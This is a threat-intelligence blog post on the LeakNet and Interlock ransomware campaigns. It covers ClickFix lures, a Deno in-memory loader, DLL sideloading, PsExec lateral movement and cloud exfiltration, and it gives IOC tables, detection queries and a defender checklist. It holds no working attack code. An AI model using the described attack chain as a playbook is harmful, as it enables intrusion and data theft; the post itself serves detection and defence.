LeakNet Ransomware Combines ClickFix Social Engineering with Deno In-Memory Loader for Stealthy Attacks
[DATE TO BE UPDATED]
A ransomware operation tracked as LeakNet is using compromised websites to serve ClickFix social engineering lures, then deploying a Deno-based loader that executes malicious JavaScript entirely in memory [1]. The approach is notable for two reasons: The approach abuses a legitimate runtime (Deno) to avoid detection, and it chains together multiple stages before any ransomware binary ever touches disk. Separate intrusion attempts linked to the same group have also been observed using Microsoft Teams-based phishing to gain initial access [1].
The campaign adds to a growing pattern. CISA published a joint advisory on the Interlock ransomware group using nearly identical ClickFix techniques, including drive-by downloads from compromised legitimate websites and fake CAPTCHA pages [3]. The convergence of tactics across multiple ransomware families signals that ClickFix has moved from a novelty to a standard component of the ransomware playbook.
What Is ClickFix and Why It Works
ClickFix is a social engineering technique that tricks users into copying and pasting malicious commands. Victims land on a compromised website (or a site mimicking a legitimate one) and encounter a fake error or CAPTCHA prompt. The page instructs the user to "fix" the issue by running a command, typically via the Windows Run dialog or PowerShell. FBI has observed actors obtaining initial access via drive-by downloads from compromised legitimate websites using this exact pattern [3].
The technique exploits user trust and requires minimal technical sophistication. The technique does not require zero-day exploits or sophisticated exploit chains, relying instead on social engineering to trick users into executing malicious commands. ClickFix has been adopted by operators deploying Lumma Stealer, DarkGate, and now both LeakNet and Interlock ransomware [3].
LeakNet's Attack Chain: From Compromised Site to Deno Loader
LeakNet's initial access starts with the ClickFix lure on a compromised website [1]. Once the victim executes the provided command, the attack chain drops PowerShell scripts with filenames following the pattern Romeo.ps1 and Visual Basic Scripts named Juliet.vbs [1]. These scripts handle the first stage: system fingerprinting and establishing communication with an external server for next-stage malware delivery [1].
The critical differentiator is what comes next. Rather than deploying a custom malware loader that's more likely to get flagged by endpoint detection, the attackers install the legitimate Deno executable [2]. Deno is a modern JavaScript and TypeScript runtime created by the original developer of Node.js. It is signed, it is legitimate, and most EDR solutions do not flag it by default.
The Deno runtime then executes Base64-encoded JavaScript payloads entirely in memory [1]. This approach sidesteps file-based detection almost completely. The payload fingerprints the system and contacts an external server for the next stage of the attack [1].
DLL Sideloading and Lateral Movement
BleepingComputer's reporting reveals additional technical detail about LeakNet's post-exploitation behavior. The group uses DLL sideloading via jli.dll, loaded through a Java executable placed in C:\ProgramData\USOShared [2]. This path is significant: USOShared is a legitimate Windows directory associated with the Update Session Orchestrator, making the presence of files there less suspicious to automated monitoring.
For lateral movement, LeakNet relies on PsExec to execute commands across the network [2]. Credential discovery uses klist enumeration to identify Kerberos tickets and map out accessible resources [2]. Data exfiltration flows to Amazon S3, giving the attackers cloud-scale storage for stolen data [2].
Parallel Playbook: Interlock Ransomware's Overlapping Tactics
The concurrent publication of CISA's Interlock advisory (AA25-203A) and LeakNet reporting reveals significant tactical overlaps [3]. Interlock actors use a nearly identical initial access method: drive-by downloads from compromised sites with fake browser update filenames masquerading as security software [3]. The overlap extends deeper into the kill chain.
Interlock deploys Cobalt Strike and SystemBC for command-and-control, along with custom tools including Interlock RAT and NodeSnake RAT [3]. The group's toolkit includes a credential stealer (cht.exe), a keylogger DLL (klg.dll) that logs keystrokes to conhost.txt, and Berserk Stealer for credential harvesting [3]. Once Interlock actors establish remote control, they use a series of PowerShell commands for further operations [3].
For persistence, Interlock uses a registry entry named Chrome Updater [4]. Remote access relies on AnyDesk and PuTTY [4]. The final ransomware payload is typically named conhost.exe and encrypts data using AES and RSA, appending either .interlock or .1nt3rlock extensions to encrypted files [4].
The data exfiltration methods are particularly aggressive. Interlock uses Azure Storage Explorer to access Azure storage accounts and AzCopy to upload stolen data to Azure storage blobs [3]. WinSCP serves as an additional file transfer tool [3]. Healthcare organizations have been heavily targeted [3].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| Filename | Romeo*.ps1 |
PowerShell scripts in LeakNet attack chain | [1] |
| Filename | Juliet*.vbs |
VBS scripts in LeakNet attack chain | [1] |
| Filename | jli.dll |
DLL used for sideloading via Java | [2] |
| Filename | C:\ProgramData\USOShared |
Directory used for DLL sideloading staging | [2] |
| Filename | cht.exe |
Credential stealer (Interlock) | [3] |
| Filename | klg.dll |
Keylogger DLL (Interlock) | [3] |
| Filename | conhost.txt |
Keystroke log file (Interlock) | [3] |
| Filename | conhost.exe |
Final ransomware payload (Interlock) | [4] |
| Malware | Deno runtime (abused) | Legitimate runtime used as in-memory loader | [1][2] |
| Malware | Cobalt Strike | C2 framework (Interlock) | [3] |
| Malware | SystemBC | C2 tool (Interlock) | [3] |
| Malware | Interlock RAT | Custom RAT | [3] |
| Malware | NodeSnake RAT | RAT for C2 and command execution | [3] |
| Malware | Berserk Stealer | Credential harvesting tool | [3] |
| Malware | Lumma Stealer | Info stealer deployed via ClickFix | [3] |
| Malware | DarkGate | Malware family using ClickFix | [3] |
MITRE ATT&CK Techniques
| ID | Technique | Relevance |
|---|---|---|
| T1189 | Drive-by Compromise | Compromised websites serving ClickFix lures [1][3] |
| T1204 | User Execution | Victims manually execute pasted commands [1] |
| T1059.001 | PowerShell | Romeo*.ps1 scripts in LeakNet chain [1] |
| T1059.007 | JavaScript | Deno-based in-memory JavaScript execution [1][2] |
| T1574.002 | DLL Side-Loading | jli.dll loaded via Java in USOShared [2] |
| T1021.002 | SMB/Windows Admin Shares | PsExec for lateral movement [2] |
| T1087 | Account Discovery | klist enumeration for Kerberos ticket discovery [2] |
| T1567.002 | Exfiltration to Cloud Storage | S3 exfiltration (LeakNet), Azure (Interlock) [2] |
| T1105 | Ingress Tool Transfer | Staging of Deno runtime and payloads [1][2] |
| T1003 | OS Credential Dumping | Credential stealer tools |
| T1056.001 | Keylogging | klg.dll keylogger |
| T1547.001 | Registry Run Keys / Startup Folder | Chrome Updater registry persistence [4] |
| T1027 | Obfuscated Files or Information | Base64-encoded JavaScript payloads [1] |
| T1486 | Data Encrypted for Impact | AES/RSA encryption of victim files [4] |
Detection and Hunting
Deno Runtime Abuse: Most enterprise environments have zero legitimate reason to run Deno. Alert on any execution of deno.exe or deno processes, particularly those spawned by PowerShell or script interpreters. Splunk query example:
process_name="deno.exe" OR process_name="deno"This should generate very few false positives in standard corporate environments.
ClickFix Behavioral Indicators: Watch for the pattern of mshta.exe, powershell.exe, or cmd.exe being launched shortly after browser activity, especially when the parent process is explorer.exe (indicating a Run dialog execution). Users pasting commands from a browser into a Run prompt create a distinctive process tree.
USOShared Directory Monitoring: The legitimate C:\ProgramData\USOShared directory should not contain Java executables or DLLs like jli.dll. File creation events in this path that aren't from Windows Update components warrant investigation [2].
PsExec and Lateral Movement: Monitor for PsExec service creation events (Event ID 7045 with service names like PSEXESVC) and klist command-line execution, which indicates Kerberos ticket enumeration [2].
Cloud Exfiltration Indicators: Outbound connections to S3 endpoints (.s3.amazonaws.com) or Azure Blob storage (.blob.core.windows.net) from hosts that don't normally interact with these services are strong indicators of exfiltration [2]. Monitor for AzCopy.exe and Azure Storage Explorer process execution on endpoints where they aren't expected.
Romeo/Juliet Filename Pattern: Hunt for files matching Romeo.ps1 and Juliet.vbs patterns across endpoints [1]. The theatrical naming convention is distinctive enough to serve as a reliable indicator.
Analysis
LeakNet's use of the Deno runtime represents a broader trend in ransomware operations: living off the land by abusing legitimate, signed executables. The Deno binary won't trigger most application whitelisting policies because it's a legitimate developer tool. Combined with in-memory JavaScript execution, this creates a payload delivery mechanism that many endpoint detection platforms will struggle with.
The convergence between LeakNet and Interlock on ClickFix as an initial access vector is significant. Two distinct ransomware operations independently adopting the same social engineering technique points to ClickFix's effectiveness. This approach is cheaper and more reliable than purchasing zero-day exploits, and it shifts the exploitation target from software to human psychology.
The exfiltration techniques are also maturing. Both groups abuse legitimate cloud infrastructure (S3 for LeakNet, Azure for Interlock) rather than attacker-controlled servers [2]. This makes network-based detection harder because the destination domains are trusted cloud services.
Healthcare continues to absorb disproportionate impact from these operations. The sector's combination of high-value data, operational urgency, and often under-resourced security teams makes it a persistent target.
Red Sheep Assessment
Confidence: Moderate
The tactical overlap between LeakNet and Interlock goes beyond coincidence. Both use ClickFix via compromised legitimate websites, both employ living-off-the-land techniques for post-exploitation, and both exfiltrate to cloud storage. There are two possible explanations. First, the groups share tooling or operational playbooks, possibly through a common affiliate or initial access broker. Second, and more likely, the ransomware ecosystem has reached a point where successful TTPs propagate rapidly across independent groups, much like legitimate software development practices spread through conference talks and blog posts.
LeakNet's choice of Deno is a leading indicator. We assess with moderate confidence that other ransomware operations will likely adopt Deno or similar legitimate runtimes (Bun, for example) within the next quarter. The pattern of abusing signed developer tools for in-memory execution is too effective to stay contained to one group.
The Teams-based phishing vector that LeakNet is also using [1] suggests the group maintains multiple initial access methods simultaneously. This operational flexibility points to either a well-resourced group or strong ties to initial access brokers who can supply diverse entry points.
The distinctive Romeo/Juliet naming convention could indicate either operational indiscipline or deliberate misdirection. We assess with low confidence that these may be dynamically generated filenames where the theatrical prefix serves as a campaign identifier.
Defender's Checklist
- ▢[ ] Block or alert on Deno runtime execution across all endpoints. Query:
process_name="deno.exe" OR process_commandline CONTAINS "deno run". Organizations without legitimate Deno usage should implement blocking controls. - ▢[ ] Monitor
C:\ProgramData\USOSharedfor any non-Windows-Update file creation, particularly executables and DLLs. Deploy a file integrity monitoring rule on this path. - ▢[ ] Hunt for
Romeo.ps1andJuliet.vbsfile patterns across all endpoints and file shares using EDR file search capabilities. - ▢[ ] Audit outbound traffic to S3 (
.s3.amazonaws.com) and Azure Blob (.blob.core.windows.net) endpoints. Flag any connections from hosts not on an approved list for cloud storage access. - ▢[ ] Conduct targeted phishing simulations mimicking ClickFix attacks: create test pages with fake CAPTCHA prompts that log (but don't execute) when users attempt to paste commands. Track metrics and provide immediate corrective training for users who fall for the simulation.
References
[1] https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
[2] https://www.bleepingcomputer.com/news/security/leaknet-ransomware-uses-clickfix-and-deno-runtime-for-stealthy-attacks/
[3] https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
[4] https://www.picussecurity.com/resource/blog/cisa-alert-aa25-203a-interlock-ransomware-analysis